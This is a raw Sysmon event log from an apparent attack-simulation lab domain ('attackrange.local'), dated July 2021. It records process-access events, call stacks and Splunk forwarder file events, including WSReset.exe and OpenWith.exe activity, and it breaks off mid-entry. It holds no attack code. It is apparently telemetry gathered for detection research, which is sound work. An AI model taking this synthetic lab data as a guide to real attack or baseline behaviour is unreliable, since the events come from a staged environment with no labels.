08:04:24.208{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.208{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.190{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\System32\OpenWith.exe10.0.14393.4169 (rs1_release.210107-1130)Pick an appMicrosoft® Windows® Operating SystemMicrosoft CorporationOpenWith.exeC:\Windows\system32\OpenWith.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=196A5E5EF42F8CADACD75FAF17E18689,SHA256=8E9759AE4C7644BC975A2A33BC9E4D17C39B4D6DAAE19F7401181C05DC9D1B90,IMPHASH=3DC53F3258E7C5C7131E7C13F7BD06C9{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001053356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.180{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.180{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.050{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1646E61C10B4300CE5B87E5100D6E7F,SHA256=FEC05D933E60E92E8C29AB3C09C058EFEA02530DD979171897BB46288FD291FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.031{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5446FEC0CEBF9DFEFAC4AE942FAF4C1C,SHA256=654C8F07FB90C11B80630DF7B07D022C804DA570E8A0FC3C38FA3A2272A4ED8E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809761Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.838{0C1E0330-F789-60EB-C979-00000000D001}23721840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809760Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F789-60EB-C979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809759Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809758Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809757Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809756Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809755Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809754Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809753Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809752Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809751Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809750Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F789-60EB-C979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809749Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F789-60EB-C979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809748Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.667{0C1E0330-F789-60EB-C979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809747Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.479{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E0A1F58EC946618E7A5C093133FDA0F,SHA256=D7E3786C8209AEE9E9B5BE00BDBFCD4485CF903815D941B242C91E85C2F4DBE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809746Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.479{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C266828483F28505887791B7D1B9B859,SHA256=BDD2CAD068D1CC8E0BF2A55514BDD23140538581B1A8E98DC9F83B89944AA5AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809745Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.479{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02F6E6A8F42BB24DFBD5D85E6945EAC7,SHA256=C38425F6DC59071C6EEFB71FFF9CAC3378B3D24F58A30E52B6EA709CAB2226BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:25.087{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBA1B978D9C1F15DE45A31C26FC677CB,SHA256=206FA4C3FB80B0C6574B7FC1EED114A6220B1A222A8B0E15DB1CA7B7D8C13ECE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809777Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.682{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E0A1F58EC946618E7A5C093133FDA0F,SHA256=D7E3786C8209AEE9E9B5BE00BDBFCD4485CF903815D941B242C91E85C2F4DBE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809776Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.651{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DCBDB0EB7173F5A24C9E253C40E567E,SHA256=76C7CB9D194B3EF113F73C51F9AD6C7DCD9FC6F1A70CF7793E0C478B11A9D526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:26.102{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75B168FC1F286E7742E3E008107CEADB,SHA256=4B66571E9DE72604675636B9AC6B0CA9A4F4B5F43DB4A3AB779EE9EB549B2A7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809775Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F78A-60EB-CA79-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809774Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809773Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809772Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 